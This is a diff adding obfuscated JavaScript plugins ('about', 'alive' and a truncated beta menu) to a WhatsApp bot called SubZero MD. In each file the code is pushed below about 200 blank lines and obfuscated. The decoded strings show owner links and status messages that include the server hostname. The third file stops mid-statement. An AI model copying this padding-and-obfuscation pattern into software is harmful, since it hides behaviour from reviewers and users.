|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
|
218 |
+
|
219 |
+
|
220 |
+
|
221 |
+
|
222 |
+
|
223 |
+
|
224 |
+
|
225 |
+
|
226 |
+
const _0x4c4269=_0x275f;(function(_0x2c90a2,_0x353d84){const _0x3d2226=_0x275f,_0x43bf41=_0x2c90a2();while(!![]){try{const _0x1da8a9=parseInt(_0x3d2226(0x141))/0x1+-parseInt(_0x3d2226(0x147))/0x2+-parseInt(_0x3d2226(0x145))/0x3*(-parseInt(_0x3d2226(0x142))/0x4)+parseInt(_0x3d2226(0x13f))/0x5+-parseInt(_0x3d2226(0x14b))/0x6*(parseInt(_0x3d2226(0x146))/0x7)+-parseInt(_0x3d2226(0x144))/0x8*(parseInt(_0x3d2226(0x13b))/0x9)+parseInt(_0x3d2226(0x139))/0xa*(parseInt(_0x3d2226(0x140))/0xb);if(_0x1da8a9===_0x353d84)break;else _0x43bf41['push'](_0x43bf41['shift']());}catch(_0x1f9c21){_0x43bf41['push'](_0x43bf41['shift']());}}}(_0x1d8c,0xe7e5d));function _0x275f(_0x259273,_0x46ccbf){const _0x1d8c28=_0x1d8c();return _0x275f=function(_0x275f96,_0xaaca3f){_0x275f96=_0x275f96-0x139;let _0x4b56da=_0x1d8c28[_0x275f96];return _0x4b56da;},_0x275f(_0x259273,_0x46ccbf);}function hi(){const _0x13752c=_0x275f;console[_0x13752c(0x13a)](_0x13752c(0x13c));}hi();const config=require(_0x4c4269(0x143)),more=String[_0x4c4269(0x14c)](0x200e),readMore=more[_0x4c4269(0x13e)](0xfa1),{cmd,commands}=require(_0x4c4269(0x13d));cmd({'pattern':_0x4c4269(0x148),'alias':[_0x4c4269(0x14d)],'react':'🇿🇼','desc':'get\x20owner\x20dec','category':'main','filename':__filename},async(_0x3b90aa,_0x4ce520,_0x5f1791,{from:_0x16d48a,quoted:_0x1e9ec2,body:_0x4caaae,isCmd:_0x442601,command:_0x4c0d65,args:_0x57d4c1,q:_0x35dced,isGroup:_0x428c78,sender:_0x3dc209,senderNumber:_0x4adabf,botNumber2:_0x173d17,botNumber:_0x2c2ffd,pushname:_0x34146d,isMe:_0xbc930f,isOwner:_0x4604b5,groupMetadata:_0x2f5cfa,groupName:_0x2e7133,participants:_0x34670a,groupAdmins:_0x2401de,isBotAdmins:_0xe4e37,isAdmins:_0x3cdf49,reply:_0x2414e2})=>{const _0x53b56b=_0x4c4269;try{let _0x1ad954='━━━━━━━━━━━━━━━━━━━━━━━━\x0a\x0a*👋\x20HELLO\x20'+_0x34146d+'😄*\x0a\x0a\x20*INTRODUCING\x20TO\x20YOU\x20SUBZERO\x20MD😇❄️*\x0a\x0aA\x20Versatile\x20WhatsApp\x20Based\x20Multi\x20Device\x20Bot\x20Created\x20By\x20Darrell\x20Mucheri\x20T\x20from\x20Zimbabwe.\x0aIt\x20sole\x20purpose\x20is\x20to\x20remove\x20the\x20burden\x20or\x20cost\x20of\x20purchasing\x20data\x20bundles\x20to\x20download\x20Songs,\x20Apps,\x20Videos\x20&\x20Movies\x20by\x20using\x20WhatsApp\x20bundles.\x0a\x0a\x20*For\x20More\x20Visit*:\x20https://mrfrankinc.vercel.app/\x0a\x0a━━━━━━━━━━━━━━━━━━━━━━━━\x0a'+readMore+_0x53b56b(0x14a);await _0x3b90aa[_0x53b56b(0x149)](_0x16d48a,{'image':{'url':config['ALIVE_IMG']},'caption':_0x1ad954},{'quoted':_0x4ce520});}catch(_0x20f715){console[_0x53b56b(0x13a)](_0x20f715),_0x2414e2(''+_0x20f715);}});function _0x1d8c(){const _0x38d167=['repeat','245810viVwTE','1309qxRIer','1521550nJKUFj','2630212WcATiT','../config','4001304ZIlRRb','3xpYoOC','1969534gkDxLw','1280990KzSzFp','about','sendMessage','\x0a\x20*SOURCE\x20CODE*\x20⛓️\x0a>\x20https://github.com/mrfrank-ofc/SUBZERO-MD\x0a\x0a\x20*FOLLOW\x20OWNER*\x20🦋\x0a>\x20https://github.com/mrfrank-ofc/\x0a\x0a\x20*OWNER\x27S\x20WHATSAPP*\x20🚀\x0a>\x20https://wa.me/18062212660/?text=SubZero+Fan+Here\x0a\x0a\x20*2ND\x20DEVELOPER*\x20🦄\x0a>\x20https://wa.me/265993702468/?text=SubZero+Fan+Here\x0a\x0a\x20*SUPPORT\x20CHANNEL*\x20🪄\x0a>\x20https://whatsapp.com/channel/0029VagQEmB002T7MWo3Sj1D\x0a\x0a\x20*FOLLOW\x20INSTAGRAM*\x20🫶\x0a>\x20https://instagram.com/mrfrankofc/\x0a\x0a\x20*FOLLOW\x20OWNER*\x20🤍\x0a>\x20https://youtube.com/mrfr4nk/\x0a\x0a┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈\x0a\x20```[RELEASE\x20DATE\x20-\x2015\x20December\x202024]```\x0a\x20\x0a>\x20*MR\x20FRANK\x20OFC*\x0a\x0a━━━━━━━━━━━━━━━━━━━━━━━━\x0a','24VrXPDB','fromCharCode','mrfrank','125030vfbVbx','log','18penCxk','Hello\x20World!','../command'];_0x1d8c=function(){return _0x38d167;};return _0x1d8c();}
|
plugins/main-alive.js
ADDED
@@ -0,0 +1,217 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
function _0x1f12(_0x1c34b2,_0x5c8676){const _0x70ba8d=_0x70ba();return _0x1f12=function(_0x1f127c,_0x2a36dd){_0x1f127c=_0x1f127c-0x1bc;let _0x36860b=_0x70ba8d[_0x1f127c];return _0x36860b;},_0x1f12(_0x1c34b2,_0x5c8676);}const _0x1dd55c=_0x1f12;(function(_0x515f58,_0x284a7c){const _0x462a45=_0x1f12,_0x2b63f1=_0x515f58();while(!![]){try{const _0x1b4235=-parseInt(_0x462a45(0x1d6))/0x1*(-parseInt(_0x462a45(0x1c0))/0x2)+-parseInt(_0x462a45(0x1c8))/0x3*(parseInt(_0x462a45(0x1cb))/0x4)+-parseInt(_0x462a45(0x1c4))/0x5*(parseInt(_0x462a45(0x1c2))/0x6)+parseInt(_0x462a45(0x1bd))/0x7*(parseInt(_0x462a45(0x1bf))/0x8)+-parseInt(_0x462a45(0x1d4))/0x9*(-parseInt(_0x462a45(0x1d2))/0xa)+parseInt(_0x462a45(0x1d7))/0xb*(-parseInt(_0x462a45(0x1d1))/0xc)+parseInt(_0x462a45(0x1c1))/0xd;if(_0x1b4235===_0x284a7c)break;else _0x2b63f1['push'](_0x2b63f1['shift']());}catch(_0x5f439f){_0x2b63f1['push'](_0x2b63f1['shift']());}}}(_0x70ba,0xd1352));function hi(){const _0x4416a0=_0x1f12;console['log'](_0x4416a0(0x1cf));}hi();const {cmd,commands}=require('../command'),os=require('os'),{runtime}=require(_0x1dd55c(0x1c9));function _0x70ba(){const _0x4fdb1a=['47059662fJGVkt','4111056cftSRc','toFixed','10YSAtHU','heapUsed','error','uptime','66NsbtEL','../lib/functions','120363304325601080@newsletter','192476gAkgIw','https://i.postimg.cc/7hL6R7NH/White-and-Green-Simple-Professional-Business-Project-Presentation-1.jpg','╭━━〔\x20*SUBZERO\x20MD*\x20〕━━┈⊷\x0a\x0a┃◈╭─────────────·๏\x0a\x0a┃◈┃•\x20*⏳Uptime*:\x20\x20','alive','Hello\x20World!','hostname','20205144KKblOH','3402130dnfSyj','runtime','9ypYGld','main','470521KdLSCi','11fYTtXe','\x0a\x0a┃◈┃•\x20*👨💻\x20Owner*:\x20Mr\x20Frank\x0a\x0a┃◈┃•\x20*📂\x20Version*:\x201.0.3\x0a\x0a┃◈└───────────┈⊷\x0a\x0a╰──────────────┈⊷\x0a\x0a>\x20©\x20ᴘᴏᴡᴇʀᴇᴅ\x20ʙʏ\x20sᴜʙᴢᴇʀᴏ\x20ᴍᴅ','MB\x0a\x0a┃◈┃•\x20*⚙️\x20HostName*:\x20','3318zGxsZv','sendMessage','9096FADekQ','2YlqPgz'];_0x70ba=function(){return _0x4fdb1a;};return _0x70ba();}cmd({'pattern':_0x1dd55c(0x1ce),'alias':['status',_0x1dd55c(0x1d3),_0x1dd55c(0x1c7)],'desc':'Check\x20uptime\x20and\x20system\x20status','category':_0x1dd55c(0x1d5),'react':'📟','filename':__filename},async(_0x41fdca,_0x4452d9,_0x4c213f,{from:_0x24d99b,quoted:_0x33a77a,body:_0x1fd20f,isCmd:_0x5b3437,command:_0x575fa3,args:_0x4b3e13,q:_0x142fce,isGroup:_0x4f0d7b,sender:_0xef73a9,senderNumber:_0x556dcd,botNumber2:_0x122dd9,botNumber:_0x294404,pushname:_0x40f485,isMe:_0x47ba9c,isOwner:_0x20ed13,groupMetadata:_0x36d695,groupName:_0x53c692,participants:_0x38cf4f,groupAdmins:_0x301142,isBotAdmins:_0x4b4e84,isAdmins:_0x111719,reply:_0x2c7dc6})=>{const _0x4af078=_0x1dd55c;try{const _0x54a5ab=_0x4af078(0x1cd)+runtime(process[_0x4af078(0x1c7)]())+'\x20\x0a\x0a┃◈┃•\x20*📟\x20Ram\x20usage*:\x20'+(process['memoryUsage']()[_0x4af078(0x1c5)]/0x400/0x400)['toFixed'](0x2)+'MB\x20/\x20'+(os['totalmem']()/0x400/0x400)[_0x4af078(0x1c3)](0x2)+_0x4af078(0x1bc)+os[_0x4af078(0x1d0)]()+_0x4af078(0x1d8);await _0x41fdca[_0x4af078(0x1be)](_0x24d99b,{'image':{'url':_0x4af078(0x1cc)},'caption':_0x54a5ab,'contextInfo':{'mentionedJid':[_0x4c213f['sender']],'forwardingScore':0x3e7,'isForwarded':!![],'forwardedNewsletterMessageInfo':{'newsletterJid':_0x4af078(0x1ca),'newsletterName':'『\x20𝐒𝐔𝐁𝐙𝐄𝐑𝐎\x20𝐌𝐃\x20』','serverMessageId':0x8f}}},{'quoted':_0x4452d9});}catch(_0x454bf1){console[_0x4af078(0x1c6)]('Error\x20in\x20alive\x20command:',_0x454bf1),_0x2c7dc6('An\x20error\x20occurred:\x20'+_0x454bf1['message']);}});
|
plugins/main-beta-menu.js
ADDED
@@ -0,0 +1,217 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
const _0x244a4b=_0x1f98;(function(_0x21e13d,_0x3cf812){const _0xe62f03=_0x1f98,_0x2019f0=_0x21e13d();while(!![]){try{const _0x355e73=-parseInt(_0xe62f03(0x164))/0x1*(-parseInt(_0xe62f03(0x160))/0x2)+parseInt(_0xe62f03(0x16e))/0x3*(-parseInt(_0xe62f03(0x151))/0x4)+parseInt(_0xe62f03(0x178))/0x5+parseInt(_0xe62f03(0x177))/0x6+-parseInt(_0xe62f03(0x15d))/0x7*(parseInt(_0xe62f03(0x170))/0x8)+-parseInt(_0xe62f03(0x14a))/0x9+parseInt(_0xe62f03(0x179))/0xa;if(_0x355e73===_0x3cf812)break;else _0x2019f0['push'](_0x2019f0['shift']());}catch(_0x21ec1b){_0x2019f0['push'](_0x2019f0['shift']());}}}(_0x18d3,0xa57d1));function hi(){const _0x268f5f=_0x1f98;console[_0x268f5f(0x168)]('Hello\x20World!');}function _0x1f98(_0x1267dd,_0x34ddd3){const _0x18d3bb=_0x18d3();return _0x1f98=function(_0x1f9810,_0x57d7e5){_0x1f9810=_0x1f9810-0x147;let _0x2890ab=_0x18d3bb[_0x1f9810];return _0x2890ab;},_0x1f98(_0x1267dd,_0x34ddd3);}hi();const config=require(_0x244a4b(0x16b)),{cmd,commands}=require(_0x244a4b(0x163)),os=require('os'),{runtime}=require(_0x244a4b(0x154)),axios=require(_0x244a4b(0x166));function _0x18d3(){const 